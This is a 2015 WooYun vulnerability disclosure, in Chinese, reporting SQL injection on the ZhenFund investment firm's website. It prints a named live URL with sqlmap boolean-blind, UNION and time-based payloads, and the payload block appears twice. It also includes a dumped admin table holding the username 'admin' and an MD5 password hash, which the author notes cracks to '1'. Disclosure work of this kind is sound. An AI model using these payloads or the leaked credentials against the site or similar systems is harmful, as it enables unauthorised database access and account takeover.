真格基金某处存在SQL注入
- 发表于
- WooYun漏洞库
漏洞概要
缺陷编号:WooYun-2015-0127853
漏洞标题:真格基金某处存在SQL注入
相关厂商:真格基金
漏洞作者:路人甲
提交时间:2015-07-20 18:47
公开时间:2015-09-03 18:48
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:未联系到厂商或者厂商积极忽略
Tags标签:
漏洞详情
披露状态:
2015-07-20: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-09-03: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
这是峰会圆桌上面的真格基金么快来认领下吧
详细说明:
真格基金 主站注入http://www.zhenfund.com/Home/Index/category/id/4
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
Place: URI<br> Parameter: #1*<br> Type: boolean-based blind<br> Title: AND boolean-based blind - WHERE or HAVING clause<br> Payload: http://www.zhenfund.com:80/Home/Index/category/id/4) AND 1240=1240 AND (9452=9452Type: UNION query<br> Title: MySQL UNION query (NULL) - 14 columns<br> Payload: http://www.zhenfund.com:80/Home/Index/category/id/4) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71796f6971,0x5a6b57744f626f4c544d,0x716f6f7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#Type: AND/OR time-based blind<br> Title: MySQL > 5.0.11 AND time-based blind<br> Payload: http://www.zhenfund.com:80/Home/Index/category/id/4) AND SLEEP(5) AND (8248=8248<br> ---<br> [13:46:07] [INFO] the back-end DBMS is MySQL<br> web server operating system: Windows<br> web application technology: Apache 2.4.10<br> back-end DBMS: MySQL 5.0.11<br> [13:46:07] [INFO] fetching current user<br>current user: '[email protected]' |
|
1 2 3 4 5 6 7 8 |
Database: lfm_zgjj<br> Table: zgjj_admin<br> [1 entry]<br> +---------+--------------+------+---------+----------+----------------------------------+------------+<br> | adminId | createUserId | role | useFlag | username | password | createTime |<br> +---------+--------------+------+---------+----------+----------------------------------+------------+<br> | 1 | 1 | 4 | 1 | admin | c4ca4238a0b923820dcc509a6f75849b | 1427267282 |<br> +---------+--------------+------+---------+----------+----------------------------------+------------+ |
密码居然是1
漏洞证明:
真格基金 主站注入http://www.zhenfund.com/Home/Index/category/id/4
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
Place: URI<br> Parameter: #1*<br> Type: boolean-based blind<br> Title: AND boolean-based blind - WHERE or HAVING clause<br> Payload: http://www.zhenfund.com:80/Home/Index/category/id/4) AND 1240=1240 AND (9452=9452Type: UNION query<br> Title: MySQL UNION query (NULL) - 14 columns<br> Payload: http://www.zhenfund.com:80/Home/Index/category/id/4) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71796f6971,0x5a6b57744f626f4c544d,0x716f6f7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#Type: AND/OR time-based blind<br> Title: MySQL > 5.0.11 AND time-based blind<br> Payload: http://www.zhenfund.com:80/Home/Index/category/id/4) AND SLEEP(5) AND (8248=8248<br> ---<br> [13:46:07] [INFO] the back-end DBMS is MySQL<br> web server operating system: Windows<br> web application technology: Apache 2.4.10<br> back-end DBMS: MySQL 5.0.11<br> [13:46:07] [INFO] fetching current user<br>current user: '[email protected]' |
|
1 2 3 4 5 6 7 8 |
Database: lfm_zgjj<br> Table: zgjj_admin<br> [1 entry]<br> +---------+--------------+------+---------+----------+----------------------------------+------------+<br> | adminId | createUserId | role | useFlag | username | password | createTime |<br> +---------+--------------+------+---------+----------+----------------------------------+------------+<br> | 1 | 1 | 4 | 1 | admin | c4ca4238a0b923820dcc509a6f75849b | 1427267282 |<br> +---------+--------------+------+---------+----------+----------------------------------+------------+ |
密码居然是1
修复方案:
过滤排查其他
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)
评价
原文连接:真格基金某处存在SQL注入
所有媒体,可在保留署名、
原文连接的情况下转载,若非则不得使用我方内容。
